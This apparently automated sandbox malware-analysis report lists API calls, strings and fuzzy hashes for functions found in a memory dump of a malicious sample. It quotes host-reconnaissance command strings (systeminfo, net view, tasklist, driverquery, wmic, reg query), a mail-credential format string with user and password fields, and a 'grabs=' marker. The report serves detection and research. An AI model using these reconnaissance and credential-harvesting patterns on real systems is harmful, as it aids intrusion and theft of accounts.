Opcode Fuzzy Hash: e5fb5d53df5658edd25d1346dc8708883d1d662efcd36b48b1fdfbb645275e62
Instruction Fuzzy Hash: 05318F71004206AFC710AF64CC8486EBFE9FF8A358F40092DF595A3162EB31DE09DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C9AC31, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00C9AC4F
RegQueryValueExA.ADVAPI32(?,Main,00000000,747DF710,00000000,?,747DF710,00000000), ref: 00C9AC74
RtlAllocateHeap.NTDLL(00000000,?), ref: 00C9AC85
RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 00C9ACA0
HeapFree.KERNEL32(00000000,?), ref: 00C9ACBE
RegCloseKey.ADVAPI32(?), ref: 00C9ACC7

Strings

Main, xrefs: 00C9AC6B, 00C9AC70, 00C9AC9C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID: Main
API String ID: 170146033-521822810
Opcode ID: 2ec4372dc8282556bc0b10fe7aac36f847f9fa257c5c747012d30fd38c800b95
Instruction ID: d926b2d4471775af51de5204e6c260a9eb1411c199e431aaa213cf7f8103a024
Opcode Fuzzy Hash: 2ec4372dc8282556bc0b10fe7aac36f847f9fa257c5c747012d30fd38c800b95
Instruction Fuzzy Hash: CC11B2B6900109FFDF019BD5DD88EAEBBBDEB48344B1005AAE512A2160E7315E15DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA798A, Relevance: 12.1, APIs: 8, Instructions: 121memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9810A: RegCreateKeyA.ADVAPI32(80000001,07D18900,?), ref: 00C9811F
Part of subcall function 00C9810A: lstrlen.KERNEL32(07D18900,00000000,00000000,?,?,00CA79A9,00000000,?), ref: 00C9814D

RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00CA79CF
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00CA79E7
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7A49
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA7A5D
WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7AAD
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7AD6
HeapFree.KERNEL32(00000000,00C91489,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7AE6
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,00C91489,00CA5B4A,?,00000001), ref: 00CA7AEF

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: b9d9ad234a7833f4f3308f18b18354cf2ef811a69d9cf15abc6eda9a5c1fd4eb
Instruction ID: 5f3024c1a20e3d2027c04906aaa25674bd64e055ccb0822ef4c59f37dbe5ab7f
Opcode Fuzzy Hash: b9d9ad234a7833f4f3308f18b18354cf2ef811a69d9cf15abc6eda9a5c1fd4eb
Instruction Fuzzy Hash: 6C41A0B5C0410AFFDF119FD4DC84AAEBB79FB09348F10456AE515A2260D7314F95EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA1FF, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CB470F), ref: 00CAA215
wsprintfA.USER32 ref: 00CAA23D
lstrlen.KERNEL32(?), ref: 00CAA24C

Part of subcall function 00CA4FB0: RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

wsprintfA.USER32 ref: 00CAA28C
wsprintfA.USER32 ref: 00CAA2C1
memcpy.NTDLL(00000000,?,?), ref: 00CAA2CE
memcpy.NTDLL(00000008,00CB83E4,00000002,00000000,?,?), ref: 00CAA2E3
wsprintfA.USER32 ref: 00CAA306

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 690bc08ffe3a326c61f6afc5eee10f0e59191b97081812daed2e14729853eb5d
Instruction ID: 3024edce8f81c5d098ee230ad4442d0cbb0c618f003073185b0b15fac79ba63c
Opcode Fuzzy Hash: 690bc08ffe3a326c61f6afc5eee10f0e59191b97081812daed2e14729853eb5d
Instruction Fuzzy Hash: C5412E71A0020AAFDB10DF98DC84EAEB3FCEF49308B144165E559D7221EB31EA19DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C9F119, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812
Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
Part of subcall function 00CA8800: GetCurrentThreadId.KERNEL32 ref: 00CA8838
Part of subcall function 00CA8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
Part of subcall function 00CA8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
Part of subcall function 00CA8800: lstrcpy.KERNEL32(00000000), ref: 00CA8874

HeapFree.KERNEL32(00000000,00000000,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000,?,net view >,00000000), ref: 00C9F209

Strings

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 00C9F1CD
net view >, xrefs: 00C9F175
nslookup 127.0.0.1 >, xrefs: 00C9F18B
driverquery.exe >, xrefs: 00C9F1B7
wmic computersystem get domain |more , xrefs: 00C9F13C
systeminfo.exe >, xrefs: 00C9F15B
tasklist.exe /SVC >, xrefs: 00C9F1A1

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$CurrentFreeHeapNameSystemThreadlstrcpy
String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe >$tasklist.exe /SVC >$wmic computersystem get domain |more
API String ID: 3485239229-3033342
Opcode ID: e7a4ac68da608a8fc171dae3ea7ee9da85f15adaeb20ea71b9daeef72faf380a
Instruction ID: 38cf31ded917cf81cba261765b4620a0e140addf2f932f4ad4fac7e7036386e0
Opcode Fuzzy Hash: e7a4ac68da608a8fc171dae3ea7ee9da85f15adaeb20ea71b9daeef72faf380a
Instruction Fuzzy Hash: CF213E33D05673A78A3135E9CC4DE6F699C8783F54B0A037DB920FB2819A418E02A1E1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA118D, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00C916BA,?,?,?,?), ref: 00CA11B1
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00CA11C3
wcstombs.NTDLL ref: 00CA11D1
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,00C916BA,?,?,?), ref: 00CA11F5
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00CA120A
mbstowcs.NTDLL ref: 00CA1217
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00C916BA,?,?,?,?,?), ref: 00CA1229
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00C916BA,?,?,?,?,?), ref: 00CA1243

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: 3d7c2cf1cffc0b2d0f7b084e266ff9cb3b343ab26a679bc1b6802d06a4a83349
Instruction ID: 2d513bdf1cc3edf6397aa04a5973695bb35b8b96cb8b5d78983094d9ae45ddda
Opcode Fuzzy Hash: 3d7c2cf1cffc0b2d0f7b084e266ff9cb3b343ab26a679bc1b6802d06a4a83349
Instruction Fuzzy Hash: D521683150020AFFCF109FA5EC48F9E7BB9FB45358F144225BA16E20A0EB719E59DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3E17, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 00CA3E23
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00CA3E41
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00CA3E49
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 00CA3E67
GetLastError.KERNEL32 ref: 00CA3E7B
RegCloseKey.ADVAPI32(?), ref: 00CA3E86
CloseHandle.KERNEL32(00000000), ref: 00CA3E8D
GetLastError.KERNEL32 ref: 00CA3E95

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: e19776cd0f9790e18871f5ee56f918570e9d7cc256e45cf083071251cd9e4783
Instruction ID: 915ae364e2108ee823c296b12b43f9c62f83627a2108e7563f8206038123a108
Opcode Fuzzy Hash: e19776cd0f9790e18871f5ee56f918570e9d7cc256e45cf083071251cd9e4783
Instruction Fuzzy Hash: F5115B3A10024AAFDB016F90EC58BAE3B6DEB49795F148125FE16C6260DB71CE08DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C9396E, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ec6fb209e15a5a439f0296096ea51964456ebddbb572f7765c81e52bf42403d2
Instruction ID: 06d93dd11961e26cf48fbee80ce13a155085e5c15ee70d4867e15aebf5ea44c2
Opcode Fuzzy Hash: ec6fb209e15a5a439f0296096ea51964456ebddbb572f7765c81e52bf42403d2
Instruction Fuzzy Hash: CAA1127590024AEFDF22AFE4CD49AAEBBB9FF05304F104069E461A2160DB719F95EF10

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C550, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,77E34620,?,00000001,00000001,?,00CA11EE,?,?,?,?,?,00000000), ref: 00C9C5A9
lstrlen.KERNEL32(?,?,?,00000000,77E34620,?,00000001,00000001,?,00CA11EE,?,?,?,?,?,00000000), ref: 00C9C5C7
RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 00C9C5F0
memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,00CA11EE,?,?,?,?,?,00000000), ref: 00C9C607
HeapFree.KERNEL32(00000000,00000000), ref: 00C9C61A
memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,00CA11EE,?,?,?,?,?,00000000), ref: 00C9C629
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,77E34620,?,00000001,00000001,?,00CA11EE,?,?,?), ref: 00C9C68D

Part of subcall function 00CA0158: RtlLeaveCriticalSection.NTDLL(?), ref: 00CA01D5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: 2b1f593c650d15813293fac1f18046e5cf4400b36823c2ccdd445a3836e5185c
Instruction ID: 86477c9c822d881b4a207b712b6c8ac0a815dabbdbbadc1b709cdf50fcf5d3e1
Opcode Fuzzy Hash: 2b1f593c650d15813293fac1f18046e5cf4400b36823c2ccdd445a3836e5185c
Instruction Fuzzy Hash: 2241C131900219EFCF22AFA4CC88BAE7BB4EF09354F114129F815A7161D770AE54EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A32B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121stringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(?,00000000,00000000,00CA154B,00000000,747DF5B0,00CA7D3D,61636F4C,00000001,?,?), ref: 00C9A33B
StrChrA.SHLWAPI(00000000,00000020), ref: 00C9A34C

Part of subcall function 00CA32D8: lstrlen.KERNEL32(?,00000000,74786980,?,00CAAEA4,?), ref: 00CA32E1
Part of subcall function 00CA32D8: memcpy.NTDLL(00000000,?,00000000,?), ref: 00CA3304
Part of subcall function 00CA32D8: memset.NTDLL ref: 00CA3313

ExitProcess.KERNEL32 ref: 00C9A480

Part of subcall function 00CA25FA: StrChrA.SHLWAPI(?,?,767FD3B0,07D18D54,?,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2620
Part of subcall function 00CA25FA: StrTrimA.SHLWAPI(?,00CBA48C,00000000,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA263F
Part of subcall function 00CA25FA: StrChrA.SHLWAPI(?,?,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2650
Part of subcall function 00CA25FA: StrTrimA.SHLWAPI(00000001,00CBA48C,?,?,00CA8517,?,00000020,07D18D54,?,?,00CB58C6,?,?), ref: 00CA2662

lstrcmp.KERNEL32(?,mail), ref: 00C9A3A9

Part of subcall function 00CA67CC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CA67EF
Part of subcall function 00CA67CC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,00000008,?,?,?,00C97010), ref: 00CA6830

Strings

mail, xrefs: 00C9A3A2
/C pause dll, xrefs: 00C9A35A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateCommandExitFreeLineProcesslstrcmplstrlenmemcpymemset
String ID: /C pause dll$mail
API String ID: 4032499568-3657633402
Opcode ID: 33f44b3b18d589d2e0ed2e34e70e990850cf5de5d8ad7dd776706c455d93c24e
Instruction ID: 774054ffb39a7081c38240d916b64ba4caadb2e688fea0a2966f90cfef152108
Opcode Fuzzy Hash: 33f44b3b18d589d2e0ed2e34e70e990850cf5de5d8ad7dd776706c455d93c24e
Instruction Fuzzy Hash: BD318D72508302AFDB10AF74DC8DA2FB7E9AB84354F00892DF5A5D2060EB70D908DB53

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FEC9, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00CBD000,00CB6985), ref: 00C9FEEB
lstrlenW.KERNEL32(?,00000000,00CBD000,00CB6985), ref: 00C9FEFC
lstrlenW.KERNEL32(?,00000000,00CBD000,00CB6985), ref: 00C9FF0E
lstrlenW.KERNEL32(?,00000000,00CBD000,00CB6985), ref: 00C9FF20
lstrlenW.KERNEL32(?,00000000,00CBD000,00CB6985), ref: 00C9FF32
lstrlenW.KERNEL32(?,00000000,00CBD000,00CB6985), ref: 00C9FF3E

Strings

type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 00C9FFC1

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen
String ID: type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
API String ID: 1659193697-1056788794
Opcode ID: d8e41d86e5942bd622cac21e9036f4f557f4b841674ce7b421c1621651d1f71d
Instruction ID: e3c5162f580b48951d4e8cacc49bbac8e483062ebce421c4066e0a6379e58010
Opcode Fuzzy Hash: d8e41d86e5942bd622cac21e9036f4f557f4b841674ce7b421c1621651d1f71d
Instruction Fuzzy Hash: A741F171E00205AFCF14DFE9C884A6EB7F9BF55304B24897DE455E3211E774DA458B50

Uniqueness

Uniqueness Score: -1.00%

Function 00CAFFD6, Relevance: 10.6, APIs: 7, Instructions: 108memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812
Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
Part of subcall function 00CA8800: GetCurrentThreadId.KERNEL32 ref: 00CA8838
Part of subcall function 00CA8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
Part of subcall function 00CA8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
Part of subcall function 00CA8800: lstrcpy.KERNEL32(00000000), ref: 00CA8874

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 00CB001C
StrTrimA.SHLWAPI(?,20000920), ref: 00CB0039
StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000001), ref: 00CB00A2
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 00CB00C3
DeleteFileA.KERNEL32(?,00003219), ref: 00CB00E2
HeapFree.KERNEL32(00000000,?), ref: 00CB00F1
HeapFree.KERNEL32(00000000,?,00003219), ref: 00CB0109

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
String ID:
API String ID: 1078934163-0
Opcode ID: 1442b6f67780868b9be93ada45b0e3255abb45b1231fea2a6d3b95ac7c18e096
Instruction ID: 8794713e5ec08fe88f1de95a61cdcfeebda10811e8ab5ebd6da377f28c046e53
Opcode Fuzzy Hash: 1442b6f67780868b9be93ada45b0e3255abb45b1231fea2a6d3b95ac7c18e096
Instruction Fuzzy Hash: B831CC32204201AFE321AB58EC05FAFBBACEB45740F140558F644E71A1EB70EE09D7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7034, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 00CA70B6
lstrcpy.KERNEL32(00000000,grabs=), ref: 00CA70C8
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 00CA70D5
lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 00CA70E7
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 00CA7118

Strings

grabs=, xrefs: 00CA70C2, 00CA70E2

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID: grabs=
API String ID: 2734445380-3012740322
Opcode ID: 2256c99215be65333ac4b830c0dbc6dee907287175a782bf70c5e955f53e0ac7
Instruction ID: 6216ab42e77d1b359a445cd43f0fc66f74907f795fe8c06f28b29a34a039edfd
Opcode Fuzzy Hash: 2256c99215be65333ac4b830c0dbc6dee907287175a782bf70c5e955f53e0ac7
Instruction Fuzzy Hash: 74317A32A0020ABFCB11DF95DC89FEE7BB9FF45354F004628F91992250EB749A15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA24F1, Relevance: 10.6, APIs: 7, Instructions: 93fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA9695: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00CA2509,?,?,00000000), ref: 00CA96A1
Part of subcall function 00CA9695: _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 00CA96B7
Part of subcall function 00CA9695: _snwprintf.NTDLL ref: 00CA96DC
Part of subcall function 00CA9695: CreateFileMappingW.KERNEL32(000000FF,00CBE0D4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 00CA96F8
Part of subcall function 00CA9695: GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00CA2509,?), ref: 00CA970A
Part of subcall function 00CA9695: CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00CA2509), ref: 00CA9742

UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?,00000000), ref: 00CA2528
CloseHandle.KERNEL32(?), ref: 00CA2531
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00CA2551
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00CA2577
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB17C0,?), ref: 00CA25B0
GetLastError.KERNEL32(00CAA098,00000000,00000000), ref: 00CA25DF
CloseHandle.KERNEL32(00000000,00CAA098,00000000,00000000), ref: 00CA25EF

Part of subcall function 00CA7854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,00C9F7B7,004F0053,00000000), ref: 00CA7860
Part of subcall function 00CA7854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,00C9F7B7,004F0053,00000000), ref: 00CA7888
Part of subcall function 00CA7854: memset.NTDLL ref: 00CA789A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Wow64$CloseFileHandle$EnableErrorLastRedirectionTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 3181697882-0
Opcode ID: 9047ec417cf9ea5616e425780e770b2f11fae834f22543cf9c134d3abd6dad8b
Instruction ID: 08e09a37cdd6ecf73053cd8f1cee1a3c60aa36310ac4ee3086bef100aa1cff60
Opcode Fuzzy Hash: 9047ec417cf9ea5616e425780e770b2f11fae834f22543cf9c134d3abd6dad8b
Instruction Fuzzy Hash: 73310372E00226ABEB10ABB9ED44BAE77B8FF46319F100165E851E7190DB349A05EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C994B4, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,74785520,?,?,?,00C91647,0000010D,00000000,00000000), ref: 00C994E4
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00C994FA
memcpy.NTDLL(00000010,?,00000000,?,?,?,00C91647,0000010D), ref: 00C99530
memcpy.NTDLL(00000010,00000000,00C91647,?,?,?,00C91647), ref: 00C9954B
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 00C99569
GetLastError.KERNEL32(?,?,?,00C91647), ref: 00C99573
HeapFree.KERNEL32(00000000,00000000,?,?,?,00C91647), ref: 00C99599

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID:
API String ID: 2237239663-0
Opcode ID: 0149bccf0a6b8536500981f0a52637bfc71a6eb0e04556b75f5d773e26d6db06
Instruction ID: b2555538301c91aa62a2eac44d5cf775c41ff193e2c97ececa0878ba34503240
Opcode Fuzzy Hash: 0149bccf0a6b8536500981f0a52637bfc71a6eb0e04556b75f5d773e26d6db06
Instruction Fuzzy Hash: C831AB36900209EFDF21DFA9EC48BAF7BB8EB44354F104529F916D2250E6309A59DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAABAA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CAB8FB: RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00CAB903
Part of subcall function 00CAB8FB: RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00CAB918
Part of subcall function 00CAB8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 00CAB931

RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 00CAABDA
memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00C9AF7F,?,00000000), ref: 00CAABEB
lstrcmpi.KERNEL32(00000002,?), ref: 00CAAC31
memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00C9AF7F,?,00000000), ref: 00CAAC45
HeapFree.KERNEL32(00000000,00000000,Blocked,00000000,?,00000000,?,?,?,?,?,?,?,00C9AF7F,?,00000000), ref: 00CAAC84

Strings

Blocked, xrefs: 00CAABB3, 00CAAC68

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked
API String ID: 733514052-367579676
Opcode ID: 915c0a8b2413febbc901a49857205e5d4a7689e7eb558b9fc30946d6300d305d
Instruction ID: 2c374aef6b773753147062722945d85a947a5b3f1958e3fcd7987c7a6fd842ca
Opcode Fuzzy Hash: 915c0a8b2413febbc901a49857205e5d4a7689e7eb558b9fc30946d6300d305d
Instruction Fuzzy Hash: BA21F471900216BFDF10AFA9DC89BAE7B78FF05368F144038F915A2250E7719E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3166, Relevance: 10.6, APIs: 7, Instructions: 82stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 00CA317E
lstrcmpiW.KERNEL32(00000000,0065002E), ref: 00CA31B5
lstrcmpiW.KERNEL32(?,0064002E), ref: 00CA31CA
lstrlenW.KERNEL32(?), ref: 00CA31D1
CloseHandle.KERNEL32(?), ref: 00CA31F9
DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 00CA3225
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00CA3242

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: f24701148f07e41d6c984cb86c52edfeb8d4f485e0feaf2afc29659837393e5d
Instruction ID: e05006be9f36ba3bb0b59fbc27de3d48f8107944847e80c829085cd9198106a0
Opcode Fuzzy Hash: f24701148f07e41d6c984cb86c52edfeb8d4f485e0feaf2afc29659837393e5d
Instruction Fuzzy Hash: 14214F71600246ABDB10AFB5ED88FAE7BBCAF05745F140264F502E2152EB30EB09DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4344, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00C9436A,00000000,00CBE260,00CBE280,?,?,00C9436A,00C9AB0F,00CBE260), ref: 00CA4354
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00CA436A
lstrlen.KERNEL32(00C9AB0F,?,?,00C9436A,00C9AB0F,00CBE260), ref: 00CA4372
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00CA437E
lstrcpy.KERNEL32(00CBE260,00C9436A), ref: 00CA4394
HeapFree.KERNEL32(00000000,00000000,?,?,00C9436A,00C9AB0F,00CBE260), ref: 00CA43E8
HeapFree.KERNEL32(00000000,00CBE260,?,?,00C9436A,00C9AB0F,00CBE260), ref: 00CA43F7

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: 1ec4b29301b79b8363e43c4b34fb7877d8de14b87eec249bc9d6d5cc9d687659
Instruction ID: a127087e5be6c8eab2da70af472ecdf6e1d218bdba7d1fda43660f093e8faf95
Opcode Fuzzy Hash: 1ec4b29301b79b8363e43c4b34fb7877d8de14b87eec249bc9d6d5cc9d687659
